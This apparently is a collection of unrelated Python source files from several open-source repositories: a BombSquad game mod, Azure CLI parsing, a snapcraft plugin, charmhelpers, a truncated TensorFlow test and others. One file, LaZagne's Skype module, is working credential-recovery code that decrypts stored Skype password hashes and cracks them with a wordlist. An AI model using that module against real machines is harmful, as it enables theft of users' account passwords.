def _getSpawnPoint(self,player):
# in solo-mode, if there's an existing live player on the map, spawn at whichever
# spot is farthest from them (keeps the action spread out)
if self._soloMode:
livingPlayer = None
for team in self.teams:
for player in team.players:
if player.isAlive():
p = player.actor.node.position
livingPlayer = player
livingPlayerPos = p
break
if livingPlayer:
playerPos = bs.Vector(*livingPlayerPos)
points = []
for team in self.teams:
startPos = bs.Vector(*self.getMap().getStartPosition(team.getID()))
points.append([(startPos-playerPos).length(),startPos])
points.sort()
return points[-1][1]
else:
return None
else:
return None
def spawnPlayer(self,player):
"""This next line is the default spawn line. But we need to spawn our special guy"""
#self.spawnPlayerSpaz(player,self._getSpawnPoint(player))
#position = self._getSpawnPoint(player)
#if isinstance(self.getSession(), bs.TeamsSession):
# position = self.getMap().getStartPosition(player.getTeam().getID())
#else:
# # otherwise do free-for-all spawn locations
position = self.getMap().getFFAStartPosition(self.players)
angle = 20
#spaz = self.spawnPlayerSpaz(player)
# lets reconnect this player's controls to this
# spaz but *without* the ability to attack or pick stuff up
#spaz.connectControlsToPlayer(enablePunch=False,
# enableBomb=False,
# enablePickUp=False)
# also lets have them make some noise when they die..
#spaz.playBigDeathSound = True
name = player.getName()
lightColor = bsUtils.getNormalizedColor(player.color)
displayColor = bs.getSafeColor(player.color, targetIntensity=0.75)
spaz = PlayerSpaz_BTY(color=player.color,
highlight=player.highlight,
character=player.character,
player=player)
player.setActor(spaz)
#For some reason, I can't figure out how to get a list of all spaz.
#Therefore, I am making the list here so I can get which spaz belongs
#to the player supplied by HitMessage.
self.spazList.append(spaz)
# we want a bigger area-of-interest in co-op mode
# if isinstance(self.getSession(),bs.CoopSession): spaz.node.areaOfInterestRadius = 5.0
# else: spaz.node.areaOfInterestRadius = 5.0
# if this is co-op and we're on Courtyard or Runaround, add the material that allows us to
# collide with the player-walls
# FIXME; need to generalize this
if isinstance(self.getSession(), bs.CoopSession) and self.getMap().getName() in ['Courtyard', 'Tower D']:
mat = self.getMap().preloadData['collideWithWallMaterial']
spaz.node.materials += (mat,)
spaz.node.rollerMaterials += (mat,)
spaz.node.name = name
spaz.node.nameColor = displayColor
spaz.connectControlsToPlayer()
self.scoreSet.playerGotNewSpaz(player, spaz)
# move to the stand position and add a flash of light
spaz.handleMessage(bs.StandMessage(position, angle if angle is not None else random.uniform(0, 360)))
t = bs.getGameTime()
bs.playSound(self._spawnSound, 1, position=spaz.node.position)
light = bs.newNode('light', attrs={'color': lightColor})
spaz.node.connectAttr('position', light, 'position')
bsUtils.animate(light, 'intensity', {0: 0, 250: 1, 500: 0})
bs.gameTimer(500, light.delete)
#Start code to spawn special guy:
#End of code to spawn special guy
if not self._soloMode:
bs.gameTimer(300,bs.Call(self._printLives,player))
# if we have any icons, update their state
for icon in player.gameData['icons']:
icon.handlePlayerSpawned()
def _printLives(self,player):
if not player.exists() or not player.isAlive(): return
try: pos = player.actor.node.position
except Exception,e:
print 'EXC getting player pos in bsElim',e
return
bs.PopupText('x'+str(player.gameData['lives']-1),color=(1,1,0,1),
offset=(0,-0.8,0),randomOffset=0.0,scale=1.8,position=pos).autoRetain()
def onPlayerLeave(self,player):
bs.TeamGameActivity.onPlayerLeave(self,player)
player.gameData['icons'] = None
if player in self.winners:
self.winners.remove(player)
# remove us from spawn-order
if self._soloMode:
if player in player.getTeam().gameData['spawnOrder']:
player.getTeam().gameData['spawnOrder'].remove(player)
# update icons in a moment since our team will be gone from the list then
bs.gameTimer(0, self._updateIcons)
def onBegin(self):
bs.TeamGameActivity.onBegin(self)
self.setupStandardTimeLimit(self.settings['Time Limit'])
self.setupStandardPowerupDrops()
if self._soloMode:
self._vsText = bs.NodeActor(bs.newNode("text",
attrs={'position':(0,105),
'hAttach':"center",
'hAlign':'center',
'maxWidth':200,
'shadow':0.5,
'vrDepth':390,
'scale':0.6,
'vAttach':"bottom",
'color':(0.8,0.8,0.3,1.0),
'text':bs.Lstr(resource='vsText')}))
# if balance-team-lives is on, add lives to the smaller team until total lives match
if (isinstance(self.getSession(),bs.TeamsSession)
and self.settings['Balance Total Lives']
and len(self.teams[0].players) > 0
and len(self.teams[1].players) > 0):
if self._getTotalTeamLives(self.teams[0]) < self._getTotalTeamLives(self.teams[1]):
lesserTeam = self.teams[0]
greaterTeam = self.teams[1]
else:
lesserTeam = self.teams[1]
greaterTeam = self.teams[0]
addIndex = 0
while self._getTotalTeamLives(lesserTeam) < self._getTotalTeamLives(greaterTeam):
lesserTeam.players[addIndex].gameData['lives'] += 1
addIndex = (addIndex + 1) % len(lesserTeam.players)
self._updateIcons()
# we could check game-over conditions at explicit trigger points,
# but lets just do the simple thing and poll it...
bs.gameTimer(1000, self._update, repeat=True)
def _getTotalTeamLives(self,team):
return sum(player.gameData['lives'] for player in team.players)
def handleMessage(self,m):
if isinstance(m,bs.PlayerSpazDeathMessage):
bs.TeamGameActivity.handleMessage(self, m) # augment standard behavior
player = m.spaz.getPlayer()
respawnPoints = None
print([player, m.spaz.hitPoints, "killed by", m.killerPlayer])
if m.killerPlayer is None:
pass #Don't take away a life for non-violent death
elif m.killerPlayer == m.spaz.getPlayer():
pass #No credit for suicide!
            elif m.spaz.hitPoints > 0: #Spaz died, but had positive hit points. Probably fell. Don't take a life from the player.
#tossing or knocking off a player respawns them w/o taking life.
print([player, "died from fall.", m.spaz.hitPoints])
pass
else:
player.gameData['lives'] -= 1
#Remove this spaz from the list of active spazzes
if m.spaz in self.spazList: self.spazList.remove(m.spaz)
if player.gameData['lives'] < 0:
bs.printError('Got lives < 0 in Elim; this shouldnt happen. solo:'+str(self._soloMode))
player.gameData['lives'] = 0
# if we have any icons, update their state
for icon in player.gameData['icons']:
icon.handlePlayerDied()
# play big death sound on our last death or for every one in solo mode
if self._soloMode or player.gameData['lives'] == 0:
bs.playSound(bs.Spaz.getFactory().singlePlayerDeathSound)
# if we hit zero lives, we're dead (and our team might be too)
if player.gameData['lives'] == 0:
# if the whole team is now dead, mark their survival time..
#if all(teammate.gameData['lives'] == 0 for teammate in player.getTeam().players):
if self._getTotalTeamLives(player.getTeam()) == 0:
player.getTeam().gameData['survivalSeconds'] = (bs.getGameTime()-self._startGameTime)/1000
self.winners.append(player)
else:
# otherwise, in regular mode, respawn..
if not self._soloMode:
self.respawnPlayer(player)
# in solo, put ourself at the back of the spawn order
if self._soloMode:
player.getTeam().gameData['spawnOrder'].remove(player)
player.getTeam().gameData['spawnOrder'].append(player)
else:
bs.TeamGameActivity.handleMessage(self, m)
def _update(self):
if self._soloMode:
# for both teams, find the first player on the spawn order list with lives remaining
# and spawn them if they're not alive
for team in self.teams:
# prune dead players from the spawn order
team.gameData['spawnOrder'] = [p for p in team.gameData['spawnOrder'] if p.exists()]
for player in team.gameData['spawnOrder']:
if player.gameData['lives'] > 0:
if not player.isAlive():
self.spawnPlayer(player)
self._updateIcons()
break
# if we're down to 1 or fewer living teams, start a timer to end the game
# (allows the dust to settle and draws to occur if deaths are close enough)
if (len(self._getLivingTeams()) < 2) or len(self.winners) > 2:
self._roundEndTimer = bs.Timer(500,self.endGame)
def _getLivingTeams(self):
return [team for team in self.teams if len(team.players) > 0 and any(player.gameData['lives'] > 0 for player in team.players)]
def endGame(self):
if self.hasEnded(): return
results = bs.TeamGameResults()
self._vsText = None # kill our 'vs' if its there
for team in self.teams:
results.setTeamScore(team, team.gameData['survivalSeconds'])
self.end(results=results)
|
Mrmaxmeier/BombSquad-Community-Mod-Manager
|
mods/BackToYou.py
|
Python
|
unlicense
| 25,208 | 0.012734 |
from Crypto.Cipher import AES
import xml.etree.cElementTree as ET
import win32con, win32api, win32crypt
import base64, hashlib, os
import binascii, struct
from config.constant import *
from config.write_output import print_output, print_debug
from config.header import Header
from config.moduleInfo import ModuleInfo
from config.dico import get_dico
class Skype(ModuleInfo):
def __init__(self):
options = {'command': '-s', 'action': 'store_true', 'dest': 'skype', 'help': 'skype'}
ModuleInfo.__init__(self, 'skype', 'chats', options)
def aes_encrypt(self, message, passphrase):
IV = '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
aes = AES.new(passphrase, AES.MODE_CBC, IV)
return aes.encrypt(message)
# get value used to build the salt
def get_regkey(self):
try:
accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
keyPath = 'Software\\Skype\\ProtectedStorage'
try:
hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return ''
num = win32api.RegQueryInfoKey(hkey)[1]
k = win32api.RegEnumValue(hkey, 0)
if k:
key = k[1]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
return 'failed'
# get hash from configuration file
def get_hash_credential(self, xml_file):
tree = ET.ElementTree(file=xml_file)
encrypted_hash = tree.find('Lib/Account/Credentials3')
if encrypted_hash != None:
return encrypted_hash.text
else:
return 'failed'
# decrypt hash to get the md5 to bruteforce
def get_md5_hash(self, enc_hex, key):
# convert hash from hex to binary
enc_binary = binascii.unhexlify(enc_hex)
# retrieve the salt
salt = hashlib.sha1('\x00\x00\x00\x00' + key).digest() + hashlib.sha1('\x00\x00\x00\x01' + key).digest()
# encrypt value used with the XOR operation
aes_key = self.aes_encrypt(struct.pack('I', 0) * 4, salt[0:32])[0:16]
# XOR operation
decrypted = []
for d in range(16):
decrypted.append(struct.unpack('B', enc_binary[d])[0] ^ struct.unpack('B', aes_key[d])[0])
# cast the result byte
tmp = ''
for dec in decrypted:
tmp = tmp + struct.pack(">I", dec).strip('\x00')
# byte to hex
return binascii.hexlify(tmp)
def dictionary_attack(self, login, md5):
wordlist = get_dico()
for word in wordlist:
hash = hashlib.md5('%s\nskyper\n%s' % (login, word)).hexdigest()
if hash == md5:
return word
return False
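    # Illustrative check (values assumed): for a Skype login "alice" with
    # password "secret", the stored credential is
    # hashlib.md5('alice\nskyper\nsecret').hexdigest(), which is exactly what
    # dictionary_attack() recomputes for every candidate word.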
# main function
def run(self):
# print title
Header().title_info('Skype')
if 'APPDATA' in os.environ:
directory = os.environ['APPDATA'] + '\Skype'
if os.path.exists(directory):
# retrieve the key used to build the salt
key = self.get_regkey()
if key == 'failed':
print_debug('ERROR', 'The salt has not been retrieved')
else:
pwdFound = []
for d in os.listdir(directory):
if os.path.exists(directory + os.sep + d + os.sep + 'config.xml'):
values = {}
try:
values['username'] = d
# get encrypted hash from the config file
enc_hex = self.get_hash_credential(directory + os.sep + d + os.sep + 'config.xml')
if enc_hex == 'failed':
                                    print_debug('WARNING', 'No credential stored in the config.xml file.')
else:
                                    # decrypt the hash to get the md5 to brute force
values['hash_md5'] = self.get_md5_hash(enc_hex, key)
                                    values['schema to bruteforce'] = values['username'] + '\\nskyper\\n<password>'
# Try a dictionary attack on the hash
password = self.dictionary_attack(values['username'], values['hash_md5'])
if password:
values['password'] = password
pwdFound.append(values)
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
# print the results
print_output("Skype", pwdFound)
else:
print_debug('INFO', 'Skype not installed.')
else:
print_debug('ERROR', 'The APPDATA environment variable is not defined.')
|
Relin/LaZagne
|
Windows/src/LaZagne/softwares/chats/skype.py
|
Python
|
lgpl-3.0
| 4,298 | 0.034435 |
from . import adaptVor_driver
from .adaptVor_driver import AdaptiveVoronoiDriver
|
westpa/westpa
|
src/westext/adaptvoronoi/__init__.py
|
Python
|
mit
| 82 | 0 |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import sys
import argparse
import argcomplete
import azure.cli.core.telemetry as telemetry
import azure.cli.core._help as _help
from azure.cli.core.util import CLIError
from azure.cli.core._pkg_util import handle_module_not_installed
import azure.cli.core.azlogging as azlogging
logger = azlogging.get_az_logger(__name__)
class IncorrectUsageError(CLIError):
'''Raised when a command is incorrectly used and the usage should be
displayed to the user.
'''
pass
class CaseInsensitiveChoicesCompleter(argcomplete.completers.ChoicesCompleter): # pylint: disable=too-few-public-methods
def __call__(self, prefix, **kwargs):
return (c for c in self.choices if c.lower().startswith(prefix.lower()))
# Override the choices completer with one that is case insensitive
argcomplete.completers.ChoicesCompleter = CaseInsensitiveChoicesCompleter
def enable_autocomplete(parser):
argcomplete.autocomplete = argcomplete.CompletionFinder()
argcomplete.autocomplete(parser, validator=lambda c, p: c.lower().startswith(p.lower()),
default_completer=lambda _: ())
class AzCliCommandParser(argparse.ArgumentParser):
"""ArgumentParser implementation specialized for the
Azure CLI utility.
"""
def __init__(self, **kwargs):
self.subparsers = {}
self.parents = kwargs.get('parents', [])
self.help_file = kwargs.pop('help_file', None)
# We allow a callable for description to be passed in in order to delay-load any help
# or description for a command. We better stash it away before handing it off for
# "normal" argparse handling...
self._description = kwargs.pop('description', None)
self.command_source = kwargs.pop('_command_source', None)
super(AzCliCommandParser, self).__init__(**kwargs)
def load_command_table(self, command_table):
"""Load a command table into our parser.
"""
# If we haven't already added a subparser, we
# better do it.
if not self.subparsers:
sp = self.add_subparsers(dest='_command_package')
sp.required = True
self.subparsers = {(): sp}
for command_name, metadata in command_table.items():
subparser = self._get_subparser(command_name.split())
command_verb = command_name.split()[-1]
# To work around http://bugs.python.org/issue9253, we artificially add any new
# parsers we add to the "choices" section of the subparser.
subparser.choices[command_verb] = command_verb
# inject command_module designer's help formatter -- default is HelpFormatter
fc = metadata.formatter_class or argparse.HelpFormatter
command_parser = subparser.add_parser(command_verb,
description=metadata.description,
parents=self.parents,
conflict_handler='error',
help_file=metadata.help,
formatter_class=fc,
_command_source=metadata.command_source)
argument_validators = []
argument_groups = {}
for arg in metadata.arguments.values():
if arg.validator:
argument_validators.append(arg.validator)
if arg.arg_group:
try:
group = argument_groups[arg.arg_group]
except KeyError:
# group not found so create
group_name = '{} Arguments'.format(arg.arg_group)
group = command_parser.add_argument_group(
arg.arg_group, group_name)
argument_groups[arg.arg_group] = group
param = group.add_argument(
*arg.options_list, **arg.options)
else:
try:
param = command_parser.add_argument(
*arg.options_list, **arg.options)
except argparse.ArgumentError:
dest = arg.options['dest']
if dest in ['no_wait', 'raw']:
pass
else:
raise
param.completer = arg.completer
command_parser.set_defaults(
func=metadata,
command=command_name,
_validators=argument_validators,
_parser=command_parser)
def _get_subparser(self, path):
"""For each part of the path, walk down the tree of
subparsers, creating new ones if one doesn't already exist.
"""
for length in range(0, len(path)):
parent_subparser = self.subparsers.get(tuple(path[0:length]), None)
if not parent_subparser:
# No subparser exists for the given subpath - create and register
# a new subparser.
# Since we know that we always have a root subparser (we created)
# one when we started loading the command table, and we walk the
# path from left to right (i.e. for "cmd subcmd1 subcmd2", we start
# with ensuring that a subparser for cmd exists, then for subcmd1,
# subcmd2 and so on), we know we can always back up one step and
# add a subparser if one doesn't exist
grandparent_subparser = self.subparsers[tuple(path[:length - 1])]
new_parser = grandparent_subparser.add_parser(path[length - 1])
# Due to http://bugs.python.org/issue9253, we have to give the subparser
# a destination and set it to required in order to get a
# meaningful error
parent_subparser = new_parser.add_subparsers(dest='subcommand')
parent_subparser.required = True
self.subparsers[tuple(path[0:length])] = parent_subparser
return parent_subparser
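    # Illustrative walk (command names assumed): loading "vm disk attach"
    # ensures subparsers exist for the paths (), ('vm',) and ('vm', 'disk');
    # load_command_table then registers the final "attach" parser on the
    # ('vm', 'disk') subparser returned here.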
def _handle_command_package_error(self, err_msg): # pylint: disable=no-self-use
if err_msg and err_msg.startswith('argument _command_package: invalid choice:'):
import re
try:
possible_module = re.search("argument _command_package: invalid choice: '(.+?)'",
err_msg).group(1)
handle_module_not_installed(possible_module)
except AttributeError:
# regular expression pattern match failed so unable to retrieve
# module name
pass
except Exception as e: # pylint: disable=broad-except
logger.debug('Unable to handle module not installed: %s', str(e))
def validation_error(self, message):
telemetry.set_user_fault('validation error')
return super(AzCliCommandParser, self).error(message)
def error(self, message):
telemetry.set_user_fault('parse error: {}'.format(message))
self._handle_command_package_error(message)
args = {'prog': self.prog, 'message': message}
logger.error('%(prog)s: error: %(message)s', args)
self.print_usage(sys.stderr)
self.exit(2)
def format_help(self):
is_group = self.is_group()
telemetry.set_command_details(command=self.prog[3:])
telemetry.set_success(summary='show help')
_help.show_help(self.prog.split()[1:],
self._actions[-1] if is_group else self,
is_group)
self.exit()
def _check_value(self, action, value):
# Override to customize the error message when a argument is not among the available choices
# converted value must be one of the choices (if specified)
if action.choices is not None and value not in action.choices:
msg = 'invalid choice: {}'.format(value)
raise argparse.ArgumentError(action, msg)
def is_group(self):
""" Determine if this parser instance represents a group
or a command. Anything that has a func default is considered
a group. This includes any dummy commands served up by the
"filter out irrelevant commands based on argv" command filter """
cmd = self._defaults.get('func', None)
return not (cmd and cmd.handler)
def __getattribute__(self, name):
""" Since getting the description can be expensive (require module loads), we defer
this until someone actually wants to use it (i.e. show help for the command)
"""
if name == 'description':
if self._description:
self.description = self._description() \
if callable(self._description) else self._description
self._description = None
return object.__getattribute__(self, name)
|
QingChenmsft/azure-cli
|
src/azure-cli-core/azure/cli/core/parser.py
|
Python
|
mit
| 9,504 | 0.00263 |
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2019 Manas.Tech
# License granted by Canonical Limited
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""The Crystal plugin can be used for Crystal projects using `shards`.
This plugin uses the common plugin keywords as well as those for "sources".
For more information check the 'plugins' topic for the former and the
'sources' topic for the latter.
Additionally, this plugin uses the following plugin-specific keywords:
- crystal-channel:
(string, default: latest/stable)
The Snap Store channel to install Crystal from.
- crystal-build-options
(list of strings, default: '[]')
Options to use during shards build.
"""
import os
import shutil
from snapcraft import file_utils
from snapcraft.internal import common, elf, errors
from snapcraft.plugins.v1 import PluginV1
_CRYSTAL_CHANNEL = "latest/stable"
class CrystalPlugin(PluginV1):
@classmethod
def schema(cls):
schema = super().schema()
schema["properties"]["crystal-channel"] = {
"type": "string",
"default": _CRYSTAL_CHANNEL,
}
schema["properties"]["crystal-build-options"] = {
"type": "array",
"minitems": 1,
"uniqueItems": True,
"items": {"type": "string"},
"default": [],
}
schema["required"] = ["source"]
return schema
@classmethod
def get_build_properties(cls):
return ["crystal-build-options"]
@classmethod
def get_pull_properties(cls):
return ["crystal-channel"]
def __init__(self, name, options, project):
super().__init__(name, options, project)
if project._get_build_base() not in ("core", "core16", "core18"):
raise errors.PluginBaseError(
part_name=self.name, base=project._get_build_base()
)
self.build_snaps.append("crystal/{}".format(self.options.crystal_channel))
self.build_packages.extend(
[
"gcc",
"pkg-config",
"libpcre3-dev",
"libevent-dev",
"libyaml-dev",
"libgmp-dev",
"libxml2-dev",
]
)
def build(self):
super().build()
self.run(["shards", "install", "--production"], self.builddir)
self.run(
["shards", "build", "--production"] + self.options.crystal_build_options,
self.builddir,
)
output_bin = os.path.join(self.builddir, "bin")
if not os.path.exists(output_bin):
raise errors.SnapcraftEnvironmentError(
"No binaries were built. Ensure the shards.yaml contains valid targets."
)
install_bin_path = os.path.join(self.installdir, "bin")
bin_paths = (os.path.join(output_bin, b) for b in os.listdir(output_bin))
elf_files = (elf.ElfFile(path=b) for b in bin_paths if elf.ElfFile.is_elf(b))
os.makedirs(install_bin_path, exist_ok=True)
for elf_file in elf_files:
shutil.copy2(
elf_file.path,
os.path.join(install_bin_path, os.path.basename(elf_file.path)),
)
elf_dependencies_path = elf_file.load_dependencies(
root_path=self.installdir,
core_base_path=common.get_installed_snap_path(
self.project._get_build_base()
),
arch_triplet=self.project.arch_triplet,
content_dirs=self.project._get_provider_content_dirs(),
)
for elf_dependency_path in elf_dependencies_path:
lib_install_path = os.path.join(
self.installdir, elf_dependency_path[1:]
)
os.makedirs(os.path.dirname(lib_install_path), exist_ok=True)
if not os.path.exists(lib_install_path):
file_utils.link_or_copy(
elf_dependency_path, lib_install_path, follow_symlinks=True
)
|
ubuntu-core/snapcraft
|
snapcraft/plugins/v1/crystal.py
|
Python
|
gpl-3.0
| 4,665 | 0.001501 |
import numpy as np
import h5py
f = h5py.File('hdf5/data_streaming.h5', 'w')
ADSL_2008 = f.create_group("ADSL_Montsouris_2008_07_01")
# retrieve: ADSL_2008 = f['ADSL_Montsouris_2008_07_01']
gvb_adsl_2008 = np.load('python_flows/flows_marked_GVB_juill_2008_ADSL_cut_BGP_AS.npy')
ADSL_2008.create_dataset('GVB', data=gvb_adsl_2008)
dipcp_adsl_2008 = np.load('python_flows/dipcp_flows_ADSL_juill_2008.npy')
ADSL_2008.create_dataset('dipcp', data=dipcp_adsl_2008)
FTTH_2008 = f.create_group("FTTH_Montsouris_2008_07_01")
# retrieve: FTTH_2008 = f['FTTH_Montsouris_2008_07_01']
gvb_ftth_2008 = np.load('python_flows/flows_marked_GVB_juill_2008_FTTH_BGP_AS.npy')
FTTH_2008.create_dataset('GVB', data=gvb_ftth_2008)
dipcp_ftth_2008 = np.load('python_flows/dipcp_flows_FTTH_juill_2008_TCP.npy')
FTTH_2008.create_dataset('dipcp', data=dipcp_ftth_2008)
ADSL_nov_2009 = f.create_group("ADSL_Montsouris_2009_11_26")
gvb_adsl_nov_2009 = np.load('python_flows/flows_marked_GVB_nov_2009_ADSL_BGP_AS.npy')
ADSL_nov_2009.create_dataset('GVB', data=gvb_adsl_nov_2009)
dipcp_adsl_nov_2009 = np.load('python_flows/dipcp_flows_ADSL_nov_2009.npy')
ADSL_nov_2009.create_dataset('dipcp', data=dipcp_adsl_nov_2009)
FTTH_nov_2009 = f.create_group("FTTH_Montsouris_2009_11_26")
gvb_ftth_nov_2009 = np.load('python_flows/flows_marked_GVB_nov_2009_FTTH_BGP_AS.npy')
FTTH_nov_2009.create_dataset('GVB', data=gvb_ftth_nov_2009)
dipcp_ftth_nov_2009 = np.load('python_flows/dipcp_flows_FTTH_nov_2009.npy')
FTTH_nov_2009.create_dataset('dipcp', data=dipcp_ftth_nov_2009)
ADSL_dec_2009 = f.create_group("ADSL_Rennes_2009_12_14")
gvb_adsl_dec_2009 = np.load('python_flows/flows_marked_GVB_dec_2009_ADSL_BGP_AS.npy')
ADSL_dec_2009.create_dataset('GVB', data=gvb_adsl_dec_2009)
dipcp_adsl_dec_2009 = np.load('python_flows/dipcp_flows_ADSL_dec_2009.npy')
ADSL_dec_2009.create_dataset('dipcp', data=dipcp_adsl_dec_2009)
FTTH_dec_2009 = f.create_group("FTTH_Montsouris_2009_12_14")
gvb_ftth_dec_2009 = np.load('python_flows/flows_marked_GVB_dec_2009_FTTH_BGP_AS.npy')
FTTH_dec_2009.create_dataset('GVB', data=gvb_ftth_dec_2009)
dipcp_ftth_dec_2009 = np.load('python_flows/dipcp_flows_FTTH_dec_2009.npy')
FTTH_dec_2009.create_dataset('dipcp', data=dipcp_ftth_dec_2009)
# close the file to flush all groups and datasets to disk
f.close()
|
LouisPlisso/analysis_tools
|
old_create_hdf5_data_non_interacif.py
|
Python
|
gpl-3.0
| 2,240 | 0.003125 |
from task19_PageObject.MainPage import MainPage
def test_adding_and_deleting_from_cart(driver):
main_page = MainPage(driver)
main_page.open()
# Add 3 ducks to the cart in a loop
for i in range(1, 4):
# Click at the i-d duck
product_page = main_page.click_to_product_number(i)
product_page.put_product_into_cart()
main_page = product_page.go_to_home_page()
cart_page = main_page.go_to_checkout()
cart_page.remove_all_items_from_cart()
|
byakatat/selenium-training
|
task19_PageObject/test_task19.py
|
Python
|
apache-2.0
| 498 | 0.002008 |
from charmhelpers.core.hookenv import (
config,
unit_get,
)
from charmhelpers.contrib.network.ip import (
get_address_in_network,
is_address_in_network,
is_ipv6,
get_ipv6_addr,
)
from charmhelpers.contrib.hahelpers.cluster import is_clustered
PUBLIC = 'public'
INTERNAL = 'int'
ADMIN = 'admin'
_address_map = {
PUBLIC: {
'config': 'os-public-network',
'fallback': 'public-address'
},
INTERNAL: {
'config': 'os-internal-network',
'fallback': 'private-address'
},
ADMIN: {
'config': 'os-admin-network',
'fallback': 'private-address'
}
}
def canonical_url(configs, endpoint_type=PUBLIC):
'''
Returns the correct HTTP URL to this host given the state of HTTPS
configuration, hacluster and charm configuration.
    :configs OSTemplateRenderer: A config templating object to inspect for
a complete https context.
:endpoint_type str: The endpoint type to resolve.
:returns str: Base URL for services on the current service unit.
'''
scheme = 'http'
if 'https' in configs.complete_contexts():
scheme = 'https'
address = resolve_address(endpoint_type)
if is_ipv6(address):
address = "[{}]".format(address)
return '%s://%s' % (scheme, address)
def resolve_address(endpoint_type=PUBLIC):
resolved_address = None
if is_clustered():
if config(_address_map[endpoint_type]['config']) is None:
# Assume vip is simple and pass back directly
resolved_address = config('vip')
else:
for vip in config('vip').split():
if is_address_in_network(
config(_address_map[endpoint_type]['config']),
vip):
resolved_address = vip
else:
if config('prefer-ipv6'):
fallback_addr = get_ipv6_addr()
else:
fallback_addr = unit_get(_address_map[endpoint_type]['fallback'])
resolved_address = get_address_in_network(
config(_address_map[endpoint_type]['config']), fallback_addr)
if resolved_address is None:
raise ValueError('Unable to resolve a suitable IP address'
' based on charm state and configuration')
else:
return resolved_address
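# Illustrative behaviour (comment only, not runnable outside a charm): with
# 'https' in configs.complete_contexts() and an IPv6 address such as fe80::1
# resolved above, canonical_url(configs) returns "https://[fe80::1]"; with
# plain http and e.g. 10.0.0.5 it returns "http://10.0.0.5".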
|
jiasir/openstack-trove
|
lib/charmhelpers/contrib/openstack/ip.py
|
Python
|
mit
| 2,332 | 0 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for conversion module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.python.autograph import utils
from tensorflow.python.autograph.core import converter
from tensorflow.python.autograph.impl import api
from tensorflow.python.autograph.impl import conversion
from tensorflow.python.autograph.pyct import compiler
from tensorflow.python.framework import constant_op
from tensorflow.python.keras.engine import training
from tensorflow.python.platform import test
class ConversionTest(test.TestCase):
def _simple_program_ctx(self):
return converter.ProgramContext(
options=converter.ConversionOptions(recursive=True),
autograph_module=api)
def test_is_whitelisted_for_graph(self):
def test_fn():
return constant_op.constant(1)
self.assertFalse(conversion.is_whitelisted_for_graph(test_fn))
self.assertTrue(conversion.is_whitelisted_for_graph(utils))
self.assertTrue(conversion.is_whitelisted_for_graph(constant_op.constant))
def test_convert_entity_to_ast_unsupported_types(self):
with self.assertRaises(NotImplementedError):
program_ctx = self._simple_program_ctx()
conversion.convert_entity_to_ast('dummy', program_ctx)
def test_convert_entity_to_ast_callable(self):
b = 2
def f(a):
return a + b
program_ctx = self._simple_program_ctx()
nodes, name, info = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertIs(info.namespace['b'], b)
def test_convert_entity_to_ast_function_with_defaults(self):
b = 2
c = 1
def f(a, d=c + 1):
return a + b + d
program_ctx = self._simple_program_ctx()
nodes, name, _ = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertEqual(
compiler.ast_to_source(fn_node.args.defaults[0]).strip(), 'None')
def test_convert_entity_to_ast_call_tree(self):
def g(a):
return a
def f(a):
return g(a)
program_ctx = self._simple_program_ctx()
nodes, _, _ = conversion.convert_entity_to_ast(f, program_ctx)
f_node, = nodes
self.assertEqual('tf__f', f_node.name)
def test_convert_entity_to_ast_class_hierarchy(self):
class TestBase(object):
def __init__(self, x='base'):
self.x = x
def foo(self):
return self.x
def bar(self):
return self.x
class TestSubclass(TestBase):
def __init__(self, y):
super(TestSubclass, self).__init__('sub')
self.y = y
def foo(self):
return self.y
def baz(self):
return self.y
program_ctx = self._simple_program_ctx()
with self.assertRaisesRegex(NotImplementedError, 'classes.*whitelisted'):
conversion.convert_entity_to_ast(TestSubclass, program_ctx)
def test_convert_entity_to_ast_class_hierarchy_whitelisted(self):
class TestSubclass(training.Model):
def __init__(self, y):
super(TestSubclass, self).__init__()
self.built = False
def call(self, x):
return 3 * x
program_ctx = self._simple_program_ctx()
(import_node, class_node), name, _ = conversion.convert_entity_to_ast(
TestSubclass, program_ctx)
self.assertEqual(import_node.names[0].name, 'Model')
self.assertEqual(name, 'TfTestSubclass')
self.assertEqual(class_node.name, 'TfTestSubclass')
def test_convert_entity_to_ast_lambda(self):
b = 2
f = lambda x: b * x if x > 0 else -x
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['b'], b)
def test_convert_entity_to_ast_multiple_lambdas(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda y: b * y)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
